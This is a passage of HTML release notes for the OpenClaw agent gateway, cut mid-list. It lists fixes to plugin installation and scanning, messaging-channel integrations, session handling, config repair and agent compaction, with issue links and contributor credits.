<p>Channels/onboarding: map third-party official WeCom and Yuanbao catalog entries to their published plugin ids so npm installs pass expected-plugin validation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugin SDK: restore the Mattermost and Matrix compatibility subpaths used by the pinned Yuanbao channel package so external installs can module-load after npm install. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/install: keep managed npm-root security scans from treating earlier plugin <code>openclaw</code> peer links as failures, so one external plugin install cannot poison later official npm installs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Memory LanceDB: allow installed-but-unconfigured plugin metadata to load so onboarding and setup flows can prompt for embedding config instead of failing the plugin registry first. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>CLI/plugins: keep <code>plugins enable</code> and <code>plugins disable</code> from creating unconfigured channel config sections, so channel plugins with required setup fields no longer fail validation during lifecycle probes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Doctor/config: set <code>messages.groupChat.visibleReplies: "message_tool"</code> during compatibility repair for configured-channel configs that omit a visible-reply policy, so upgrades can persist the intended tool-only group/channel reply default. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kagura-agent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kagura-agent">@kagura-agent</a>.</p>
</li>
<li>
<p>Agents/sessions: keep delayed <code>sessions_send</code> A2A replies alive after soft wait-window timeouts, while preserving terminal run timeouts and avoiding stale target replies in requester sessions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370851415" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76443" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76443/hovercard" href="https://github.com/openclaw/openclaw/issues/76443">#76443</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ryswork1993/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ryswork1993">@ryswork1993</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>TUI/Control UI: fix <code>/think</code> command showing only base thinking levels when the active session uses a different model from the default, so provider-specific levels like DeepSeek V4 Pro's <code>xhigh</code> and <code>max</code> are now visible and selectable. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370999388" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76482" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76482/hovercard" href="https://github.com/openclaw/openclaw/issues/76482">#76482</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>CLI/sessions: keep intentional empty agent replies silent after tool-delivered channel output, instead of surfacing a misleading "No reply from agent." fallback. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Config/doctor: cap <code>.clobbered.*</code> forensic snapshots per config path and serialize snapshot writes so repeated <code>doctor --fix</code> recovery loops cannot flood the config directory. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370911177" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76454" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76454/hovercard" href="https://github.com/openclaw/openclaw/issues/76454">#76454</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4250740667" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65649" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65649/hovercard" href="https://github.com/openclaw/openclaw/pull/65649">#65649</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JUSTICEESSIELP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JUSTICEESSIELP">@JUSTICEESSIELP</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rsnow/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rsnow">@rsnow</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Feishu: suppress duplicate text when replies send native voice media, preserve captions for ordinary audio files, and send fallback text plus attachment links when <code>audioAsVoice</code> transcode/upload fallback produces a generic file.</p>
</li>
<li>
<p>TTS/plugins: activate configured and inherited speech provider plugins during Gateway startup, so Microsoft and Local CLI voice replies work immediately after persona selection instead of staying invisible in the startup plugin set. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370996274" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76481" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76481/hovercard" href="https://github.com/openclaw/openclaw/issues/76481">#76481</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Feishu: keep packaged Feishu startup from bundling the Lark SDK's ESM <code>__dirname</code> path by loading the SDK as a plugin-local runtime dependency. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370278565" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76291" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76291/hovercard" href="https://github.com/openclaw/openclaw/issues/76291">#76291</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371035544" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76494" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76494/hovercard" href="https://github.com/openclaw/openclaw/issues/76494">#76494</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370701342" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76392" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76392/hovercard" href="https://github.com/openclaw/openclaw/pull/76392">#76392</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zqchris/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zqchris">@zqchris</a>.</p>
</li>
<li>
<p>Plugins/npm: build package-local runtime dist files for publishable plugins and stop listing root-package-excluded plugin sidecars in the core package metadata, so npm plugin installs such as <code>@openclaw/diffs</code> and <code>@openclaw/discord</code> no longer publish source-only runtime payloads. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370790448" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76426" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76426/hovercard" href="https://github.com/openclaw/openclaw/issues/76426">#76426</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PrinceOfEgypt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PrinceOfEgypt">@PrinceOfEgypt</a>.</p>
</li>
<li>
<p>Channels/secrets: resolve SecretRef-backed channel credentials through external plugin secret contracts after the plugin split, covering runtime startup, target discovery, webhook auth, disabled-account enumeration, and late-bound web_search config. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370595346" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76371" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76371/hovercard" href="https://github.com/openclaw/openclaw/issues/76371">#76371</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370882504" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76449" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76449/hovercard" href="https://github.com/openclaw/openclaw/pull/76449">#76449</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a>.</p>
</li>
<li>
<p>Docker/Gateway: pass Docker setup <code>.env</code> values into gateway and CLI containers and preserve exec SecretRef <code>passEnv</code> keys in managed service plans, so 1Password Connect-backed Discord tokens keep resolving after doctor or plugin repair. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Control UI/WebChat: explain compaction boundaries in chat history and link directly to session checkpoint controls so pre-compaction turns no longer look silently lost after refresh. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370766004" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76415" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76415/hovercard" href="https://github.com/openclaw/openclaw/issues/76415">#76415</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</p>
</li>
<li>
<p>Agents/compaction: add an optional bundled compaction notifier hook and retry once from the compacted transcript when automatic compaction leaves a turn without a final visible reply. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371697581" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76651" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76651/hovercard" href="https://github.com/openclaw/openclaw/pull/76651">#76651</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/simplyclever914/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/simplyclever914">@simplyclever914</a>.</p>
</li>
<li>
<p>Agents/incomplete-turn: detect and surface a warning when the agent's final text after a tool-call chain is silently dropped because the post-tool assistant response was never produced, instead of completing the turn with only the pre-tool analysis text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370985585" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76477" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76477/hovercard" href="https://github.com/openclaw/openclaw/issues/76477">#76477</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Channels/WhatsApp: attach native outbound mention metadata for group text and media captions by resolving <code>@+&lt;digits&gt;</code> and <code>@&lt;digits&gt;</code> tokens against WhatsApp participant data, including LID groups. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041311446" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39879" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/39879/hovercard" href="https://github.com/openclaw/openclaw/issues/39879">#39879</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4163220091" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56863" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/56863/hovercard" href="https://github.com/openclaw/openclaw/pull/56863">#56863</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kengi1437/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kengi1437">@kengi1437</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joe2643/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joe2643">@joe2643</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fridayck/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fridayck">@fridayck</a>.</p>
</li>
<li>
<p>Channels/WhatsApp: require outbound mention tokens to end at a word boundary so phone-number prefixes inside longer strings no longer trigger hidden native mentions.</p>
</li>
<li>
<p>Plugins/uninstall: remove empty managed git install parent directories after deleting cloned plugin repos and cover npm/git uninstall residue in Docker plugin lifecycle tests. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/install: resolve bare official external plugin IDs such as <code>brave</code> through the official catalog when no bundled source is available, so packaged installs fetch the intended scoped npm package instead of an unrelated unscoped package. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370601523" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76373" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76373/hovercard" href="https://github.com/openclaw/openclaw/issues/76373">#76373</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bek91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bek91">@bek91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/install: require OpenClaw-owned install provenance before granting official npm plugin scanner trust, so direct npm package names no longer bypass launch-code scanning while catalog, onboarding, and doctor installs stay trusted. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fede-kamel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fede-kamel">@fede-kamel</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Network proxy: preserve target TLS hostname validation for Node HTTPS requests routed through the managed HTTP proxy, so Discord-style CONNECT traffic no longer validates certificates against the local proxy host. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355182995" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74809" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74809/hovercard" href="https://github.com/openclaw/openclaw/issues/74809">#74809</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370848453" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76442" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76442/hovercard" href="https://github.com/openclaw/openclaw/pull/76442">#76442</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jesse-merhi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jesse-merhi">@jesse-merhi</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/abnershang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/abnershang">@abnershang</a>.</p>
</li>
<li>
<p>Gateway/sessions: keep <code>sessions.list</code> rows lightweight by bounding title/preview hydration to transcript head/tail reads and caching manifest model-id normalization plus setup fallback metadata against the active plugin snapshot. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rolandrscheel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rolandrscheel">@rolandrscheel</a>.</p>
</li>
<li>
<p>Gateway/performance: cache per-run verbose-level session reads, skip a redundant <code>lsof</code> scan in <code>gateway --force</code> when no listener was killed, and make the Gateway startup benchmark print usage for <code>--help</code>.</p>
</li>
<li>
<p>Gateway/sessions: keep agent runtime metadata on lightweight <code>sessions.list</code> rows and skip per-row transcript usage fallback, display model inference, and plugin projection, avoiding identity loss and event-loop stalls in large session stores. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Marvinthebored/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Marvinthebored">@Marvinthebored</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Gateway/models: keep read-only <code>models.list</code> fallbacks on persisted/current metadata, configured rows, registry-compatible fallbacks, and static auth checks while preserving full-catalog image attachment capability checks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370624457" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76382" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76382/hovercard" href="https://github.com/openclaw/openclaw/issues/76382">#76382</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370567199" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76360" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76360/hovercard" href="https://github.com/openclaw/openclaw/issues/76360">#76360</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365118757" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75707" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75707/hovercard" href="https://github.com/openclaw/openclaw/issues/75707">#75707</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/trojy13/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/trojy13">@trojy13</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RayWoo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RayWoo">@RayWoo</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AnathemaOfficial/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AnathemaOfficial">@AnathemaOfficial</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Marvinthebored/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Marvinthebored">@Marvinthebored</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>CLI/plugins: reject missing plugin ids before config writes in <code>plugins enable</code> and <code>plugins disable</code> so a typo no longer persists a stale config entry. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343056975" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73554" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73554/hovercard" href="https://github.com/openclaw/openclaw/pull/73554">#73554</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ai-hpc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ai-hpc">@ai-hpc</a>.</p>
</li>
<li>
<p>Agents/sessions: preserve delivered trailing assistant replies during session-file repair so Telegram/WebChat history is not rewritten to drop already-delivered responses. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370427059" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76329" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76329/hovercard" href="https://github.com/openclaw/openclaw/issues/76329">#76329</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</p>
</li>
<li>
<p>Gateway/chat history: preserve oversized transcript turns as explicit omitted-message placeholders while avoiding large JSONL parse stalls. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Marvinthebored/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Marvinthebored">@Marvinthebored</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>CLI/doctor: load the configured memory-slot plugin when resolving memory diagnostics so bundled <code>memory-core</code> no longer triggers a false “no active memory plugin” warning on standalone <code>doctor</code> / <code>status</code> runs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370574756" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76367" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76367/hovercard" href="https://github.com/openclaw/openclaw/issues/76367">#76367</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a>.</p>
</li>
<li>
<p>Gateway: preserve stack diagnostics when <code>chat.send</code> or agent attachment parsing/staging fails, improving image-send failure triage. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4228443758" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63432" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63432/hovercard" href="https://github.com/openclaw/openclaw/issues/63432">#63432</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359396699" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75135" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75135/hovercard" href="https://github.com/openclaw/openclaw/pull/75135">#75135</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/keen0206/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/keen0206">@keen0206</a>.</p>
</li>
<li>
<p>Agents/idle-timeout: add a cost-runaway breaker to the outer embedded-run retry loop that halts further attempts after 5 consecutive idle timeouts without completed model progress, so a wedged provider can no longer fan paid model calls out across the same run; completed text or tool-call progress resets the breaker, but partial tool-argument token dribbles do not. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370289299" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76293" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76293/hovercard" href="https://github.com/openclaw/openclaw/issues/76293">#76293</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ThePuma312/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ThePuma312">@ThePuma312</a>.</p>
</li>
<li>
<p>Heartbeats/Codex: align structured heartbeat prompts with actual <code>heartbeat_respond</code> tool availability, stop sending legacy <code>HEARTBEAT_OK</code> when the tool exists, and keep tool-disabled commitment check-ins on the legacy ack path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Agent runtimes: fail explicit plugin runtime selections honestly when the requested harness is unavailable instead of silently falling back to the embedded PI runtime. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Maintainer workflow: push prepared PR heads through GitHub's verified commit API by default and require an explicit override before git-protocol pushes can publish unsigned commits. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</p>
</li>
<li>
<p>Feishu: resolve setup/status probes through the selected/default account so multi-account configs with account-scoped app credentials show as configured and probeable. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337409818" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72930" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72930/hovercard" href="https://github.com/openclaw/openclaw/issues/72930">#72930</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brokemac79/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brokemac79">@brokemac79</a>.</p>
</li>
<li>
<p>Gateway/responses: emit every client tool call from <code>/v1/responses</code> JSON and SSE responses when the agent invokes multiple client tools in a single turn, so multi-tool plans, graph orchestration calls, and similar batched flows no longer drop every call but the last. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4116186321" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52288" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52288/hovercard" href="https://github.com/openclaw/openclaw/issues/52288">#52288</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/CharZhou/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/CharZhou">@CharZhou</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bonelli/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bonelli">@bonelli</a>.</p>
</li>
<li>
<p>Gateway/agent: enforce <code>session.sendPolicy=deny</code> on gateway agent requests only when <code>deliver: true</code>, so non-delivery smoke checks and internal agent runs are no longer rejected with <code>send blocked by session policy</code> while outbound delivery remains gated. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341403030" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73381" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73381/hovercard" href="https://github.com/openclaw/openclaw/issues/73381">#73381</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wenxu007/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wenxu007">@wenxu007</a>.</p>
</li>
<li>
<p>Slack/reactions: treat missing no_reaction remove responses as idempotent success and route own-reaction cleanup through the remove helper, so concurrent cleanup no longer surfaces Slack race errors. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4105088415" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50733" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/50733/hovercard" href="https://github.com/openclaw/openclaw/issues/50733">#50733</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370345462" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76304" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76304/hovercard" href="https://github.com/openclaw/openclaw/pull/76304">#76304</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Hollychou924/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Hollychou924">@Hollychou924</a>.</p>
</li>
<li>
